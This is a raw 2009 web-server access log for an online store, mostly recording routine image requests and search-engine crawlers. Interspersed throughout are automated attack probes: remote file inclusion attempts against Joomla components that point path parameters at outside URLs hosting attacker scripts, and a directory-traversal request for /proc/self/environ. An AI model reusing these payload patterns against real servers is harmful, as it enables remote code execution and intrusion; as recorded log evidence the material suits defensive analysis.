76.204.227.66 - - [20/May/2009:00:59:25 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:26 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:26 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:26 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:26 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:27 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:27 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:27 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:28 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:28 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:28 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:29 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:29 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:29 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:29 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:30 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:30 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
66.249.72.114 - - [20/May/2009:00:59:30 -0400] "GET /images/over-index3_crestonome.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
76.204.227.66 - - [20/May/2009:00:59:31 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:31 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:31 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.200.8.89 - - [20/May/2009:00:59:40 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
76.204.227.66 - - [20/May/2009:00:59:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0064C4493AF1E600EC8D02F+M37+ENG HTTP/1.1" 200 76110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C44A34812600D61D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.200.8.89 - - [20/May/2009:00:59:42 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
76.204.227.66 - - [20/May/2009:00:59:43 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C4493AF1E600EC8D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:43 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C4493AF1E600EC8D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.204.227.66 - - [20/May/2009:00:59:43 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C4493AF1E600EC8D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.200.8.89 - - [20/May/2009:00:59:43 -0400] "GET /logs/access_log.Q109010400%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
76.204.227.66 - - [20/May/2009:00:59:49 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0064C4493AF1E600EC8D02F+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.200.8.89 - - [20/May/2009:00:59:51 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:59:57 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:59:57 -0400] "GET /logs/access_log.Q109010400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:00:59:57 -0400] "GET /logs/access_log.Q109012300%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.81.93.2 - - [20/May/2009:00:59:59 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.81.93.2 - - [20/May/2009:00:59:59 -0400] "GET /logs/access_log.Q109010400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.81.93.2 - - [20/May/2009:01:00:00 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin.extcalendar.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:05:12:12 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.200.8.89 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q108071500//components/com_extcalendar/admin.extcalendar.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.23.154.225 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q109050300/index.php?inhalt=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 234 "-" "Avant Browser (http://www.avantbrowser.com)"
65.23.154.225 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q109050300/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
64.182.124.1 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q108122500//?_SERVER[DOCUMENT_ROOT]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.0" 404 226 "-" "libwww-perl/5.53"
65.23.154.225 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
209.200.8.89 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin.extcalendar.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.23.154.225 - - [20/May/2009:05:12:12 -0400] "GET /logs/access_log.Q109050300/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
64.182.124.1 - - [20/May/2009:05:12:12 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.0" 200 2093 "-" "libwww-perl/5.53"
64.182.124.1 - - [20/May/2009:05:12:12 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.0" 200 452 "-" "libwww-perl/5.53"
209.200.8.89 - - [20/May/2009:05:12:17 -0400] "GET /logs/access_log.Q108071500//components/com_extcalendar/admin.extcalendar.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.182.124.1 - - [20/May/2009:05:12:47 -0400] "GET /logs/error_log.Q109042900//?_SERVER[DOCUMENT_ROOT]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.0" 404 225 "-" "libwww-perl/5.53"
200.123.152.51 - - [20/May/2009:05:12:51 -0400] "GET /logs/error_log.Q109050400/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buttecreekcanyon.net/History/31337.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
200.123.152.51 - - [20/May/2009:05:12:52 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buttecreekcanyon.net/History/31337.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
200.123.152.51 - - [20/May/2009:05:12:52 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buttecreekcanyon.net/History/31337.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
209.175.180.194 - - [20/May/2009:05:12:54 -0400] "GET /logs/access_log.Q108082200%20%20/errors.php?error=http://www.wizard.com.br/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:05:12:55 -0400] "GET /logs/access_log.Q108120300//components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:12:55 -0400] "GET //components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:12:55 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:12:55 -0400] "GET /logs/access_log.Q108111700//components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:13:02 -0400] "GET /logs/access_log.Q108120300//components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:13:02 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:13:02 -0400] "GET /logs/access_log.Q108111700//components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/May/2009:05:13:02 -0400] "GET //components/com_peoplebook/param.peoplebook.php=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
66.249.72.114 - - [20/May/2009:05:12:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2048214288702800783C04F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.171 - - [20/May/2009:05:12:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [20/May/2009:05:12:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [20/May/2009:05:12:22 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [20/May/2009:05:12:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/May/2009:05:13:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [20/May/2009:05:14:02 -0400] "GET /images/menu_arrow.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
72.30.142.171 - - [20/May/2009:05:13:32 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 54803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.200.8.89 - - [20/May/2009:05:14:52 -0400] "GET /logs/access_log.Q108120300%20%20//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:14:53 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:14:53 -0400] "GET //components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:14:58 -0400] "GET //components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:05:13:55 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 54803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.171 - - [20/May/2009:05:14:13 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 54803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.161.16 - - [20/May/2009:05:15:00 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:05:15:00 -0400] "GET //index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:05:15:00 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:05:14:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 54803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.123.152.51 - - [20/May/2009:05:15:00 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buttecreekcanyon.net/History/31337.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.200.8.89 - - [20/May/2009:05:15:01 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:15:01 -0400] "GET //components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:15:01 -0400] "GET /logs/access_log.Q108120300%20%20//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:15:19 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:15:19 -0400] "GET /logs/access_log.Q108122500%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:15:19 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:15:28 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:15:31 -0400] "GET /logs/access_log.Q108122500%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:15:31 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:15:31 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:05:15:31 -0400] "GET /logs/access_log.Q108111700%20%20//components/com_peoplebook/param.peoplebook.php=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
